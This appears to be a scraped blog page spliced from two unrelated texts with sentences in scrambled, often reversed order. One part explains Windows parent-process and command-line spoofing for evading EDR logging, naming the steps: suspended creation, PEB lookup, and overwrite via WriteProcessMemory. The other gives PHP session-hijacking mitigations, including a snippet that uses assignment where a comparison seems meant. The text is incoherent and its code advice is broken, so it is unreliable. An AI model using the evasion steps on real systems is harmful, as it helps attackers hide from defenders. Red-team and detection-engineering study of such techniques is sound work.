The full proof-of-concept code written by Adam Chester is available on Github.
#Evil inside spoofer windows#
This will cause Windows to log the command line provided in step (1), even though the process code will take into account the command line used to overwrite the original one in step (3). Overwrite the command line stored in the PEB using WriteProcessMemory.Retrieve the PEB address using NtQueryInformationProcess.
Create the process in a suspended state.More specifically, the technique works as follows: The region is marked as RW, so we can write to it. The PEB inside notepad.exe’s virtual memory space. Since the PEB (and therefore the command line) is stored in the memory space of the process and not in kernel space, it is quite easy to overwrite it provided we have the appropriate rights on the process. This data structure contains a bunch of information about the process itself such as the list of loaded modules and the command line used to start the process. When a process is created, an internal Windows data structure, the Process Environment Block, is mapped inside the process virtual memory. But let’s take a quick look at how this technique works. I encourage you to go and read his article to understand the details of the implementation. Adam Chester then wrote a proof-of-concept C++ code on his blog. This is a newer technique which, as far as I know, was first described by Casey Smith on Twitter ( as Will Burgess says in his talk. The calc.exe process appears like it has been spawned by notepad.exe Process command line spoofing Actually, Didier Stevens blogged about this 10 years ago! Here’s for reference a sample piece of C++ code which will spawn cmd.exe with an arbitrary process as a parent. This is nothing new and I won’t describe in more depth. It turns out that when creating a process using the Windows native API, you can specify any arbitrary process to be used as a parent process. Example of a powershell process being spawned by Microsoft Word. These are rules that, in my experience, are of low complexity, high added value, and generate a low amount of false positives. This is very handy to build behavioral rules such as “ Microsoft Word should never spawn powershell.exe”. When a process spawns a child process, EDR solutions such as Sysmon log the action and record various information such as the newly created process name, hash, executable path, as well as information about the parent process. I first heard about them in an awesome talk, Red Teaming in the EDR age, presented by Will Burgess at the Wild West Hackin’ Fest 2018. Make the server check the timestamp.First, a bit of background on the techniques we’ll implement in Visual Basic. If your requests come from JS, think of creating a simple authentication function: Instead of sending the authentication token, salt it, pepper it with a timestamp, then hash it.If a black hat steals cookie and session, the next click by the real user will log out both and create a logable event. Refresh the session cookie quite often, on a wrong cookie kill the session.This makes the attacker need both: cookie and session ID. On a client request make something along the lines of $loggedin=($_SESSION=$_COOKIE). Do not store a "logged in" value - instead store a "session cookie" value, and set the cookie to the client.I recommend a few mitigations, that have been proven quite effective: In addition to this, stealing a client session (including a cookie) is quite easy. Now back to earth: It is quite easy, to get your PHP code "nearly right" and thus open a door between the client and the session as seen by the server. Let's start with the good news: The $_SESSION array is by default completly invisible and inmanipulable by the client: It exists on the server, and on the server only, in an execution environment, that is not open to the client.
0 kommentar(er)
